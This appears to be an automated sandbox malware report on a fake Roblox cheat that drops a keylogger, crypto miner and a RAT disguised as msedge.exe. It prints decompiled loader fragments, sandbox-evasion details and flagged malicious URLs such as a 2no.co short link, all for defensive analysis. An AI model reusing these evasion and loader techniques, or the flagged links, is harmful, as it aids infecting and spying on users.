            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1248829949.0000000000B58000.00000002.00000001.01000000.00000006.sdmp

            Data Obfuscation

            Source: BitCoin_miner.exe.3.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.3.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.3.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs .Net Code: Memory
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.3.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs .Net Code: Memory
            Source: robloxPX1instaler.exe.0.dr Static PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5002515
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.dr Static PE information: section name: .didat
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.dr Static PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\roblox cheat.exe Code function: 0_2_014E5CC4 push 8B000004h; iretd 0_2_014E5CCE
            Source: C:\Users\user\Desktop\roblox cheat.exe Code function: 0_2_014EB6FF push edi; retn 0000h 0_2_014EB701
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B03175 push ecx; ret 2_2_00B03188
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16F5166 push rsi; retf 3_2_00007FF6C16F5167
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16F5156 push rsi; retf 3_2_00007FF6C16F5157
            Source: Keyloger.exe.3.dr High entropy of concatenated method names
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe File created: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\Desktop\roblox cheat.exe File created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe File created: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\Desktop\roblox cheat.exe File created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe File created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Users\user\Desktop\roblox cheat.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe RDTSC instruction interceptor: First address: 8F39F0 second address: 8F3A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\Desktop\roblox cheat.exe Memory allocated: 14E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\roblox cheat.exe Memory allocated: 3200000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\roblox cheat.exe Memory allocated: 3090000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\roblox cheat.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Window / User API: threadDelayed 1340
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1897
            Source: C:\Users\user\Desktop\roblox cheat.exe TID: 6156 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 2032 Thread sleep time: -55827s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 2032 Thread sleep time: -55457s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe File Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16DB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16DB190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16C40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16C40BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16EFCA0 FindFirstFileExA,3_2_00007FF6C16EFCA0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16E16A4 VirtualQuery,GetSystemInfo,3_2_00007FF6C16E16A4
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Thread delayed: delay time: 55827
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Thread delayed: delay time: 55457
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.dr Binary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000002.1266710654.00000225ABFD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: robloxPX1instaler.exe, 00000002.00000003.1447851301.0000000001BCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B0E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B0E378
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B2D0F8 mov eax, dword ptr fs:[00000030h] 2_2_00B2D0F8
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B243AC mov ecx, dword ptr fs:[00000030h] 2_2_00B243AC
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B2D13C mov eax, dword ptr fs:[00000030h] 2_2_00B2D13C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16F0D20 GetProcessHeap,3_2_00007FF6C16F0D20
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B02F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B02F78
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16E3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6C16E3170
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16E2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF6C16E2510
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16E3354 SetUnhandledExceptionFilter,3_2_00007FF6C16E3354
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16E76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6C16E76D8
            Source: C:\Users\user\Desktop\roblox cheat.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\roblox cheat.exe Process created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exe Process created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16F58E0 cpuid 3_2_00007FF6C16F58E0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF6C16DA2CC
            Source: C:\Users\user\Desktop\roblox cheat.exe Queries volume information: C:\Users\user\Desktop\roblox cheat.exe VolumeInformation
            Source: C:\Users\user\Desktop\roblox cheat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Code function: 2_2_00B03495 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00B03495
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe Code function: 3_2_00007FF6C16C51A4 GetVersionExW,3_2_00007FF6C16C51A4
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match File source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 1 Obfuscated Files or Information | Security Account Manager | 136 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 21 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior graph (ID: 1484380, Sample: roblox cheat.exe, Start date: 30/07/2024, Architecture: WINDOWS, Score: 90)

            Source | Detection | Scanner | Label | Link
            roblox cheat.exe | 61% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT | -
            roblox cheat.exe | 100% | Avira | TR/Dropper.Gen | -
            roblox cheat.exe | 100% | Joe Sandbox ML | - | -

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Avira | TR/Spy.Gen | -
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Avira | TR/Spy.Gen | -
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Avira | TR/Spy.Gen | -
            C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | 100% | Joe Sandbox ML | - | -
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Joe Sandbox ML | - | -
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Joe Sandbox ML | - | -
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Joe Sandbox ML | - | -
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT | -
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT | -
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT | -
            C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | 0% | ReversingLabs | - | -
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.winimage.com/zLibDllroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerpanyrobloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454406604.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446944435.0000000003FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://s3.amazonaws.com/robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.accv.es00robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://2no.co/chromecache_64.20.drfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.hrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ecsv2.roblox.com/client/pberoblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://2no.co/redirect-2chromecache_64.20.drfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperaterobloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
88.212.201.198 | counter.yadro.ru | Russian Federation | 39134 | UNITEDNETRU | false
172.217.18.4 | www.google.com | United States | 15169 | GOOGLEUS | false
18.239.18.53 | d2v57ias1m20gl.cloudfront.net | United States | 16509 | AMAZON-02US | false
128.116.21.3 | edge-term4-ams2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false
172.67.132.113 | cdn.iplogger.org | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
88.212.201.204 | unknown | Russian Federation | 39134 | UNITEDNETRU | false
172.67.149.76 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
                                  IP
                                  192.168.2.7
                                  192.168.2.5
                                  127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1484380
Start date and time: 2024-07-30 00:45:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: roblox cheat.exe
Detection: MAL
Classification: mal90.troj.spyw.evad.winEXE@26/17@22/12
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 108.177.15.84, 172.217.16.206, 34.104.35.123, 93.184.221.240, 142.250.185.131, 142.250.186.110
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target roblox cheat.exe, PID 4840 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: roblox cheat.exe
Time | Type | Description
18:46:12 | API Interceptor | 3x Sleep call for process: robloxPX1instaler.exe modified
                                                                                                RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                                                • 128.116.21.4
                                                                                                SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.3
                                                                                                SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                • 128.116.123.3
                                                                                                CLOUDFLARENETUShttp://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                • 188.114.97.3
                                                                                                http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.17.25.14
                                                                                                http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 188.114.96.3
                                                                                                http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.147.209
                                                                                                http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.3.35
                                                                                                http://pub-150673a82d0042c3be06302794553f66.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.17.25.14
                                                                                                http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.18.11.207
                                                                                                http://mentmiasklogione.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 172.64.147.209
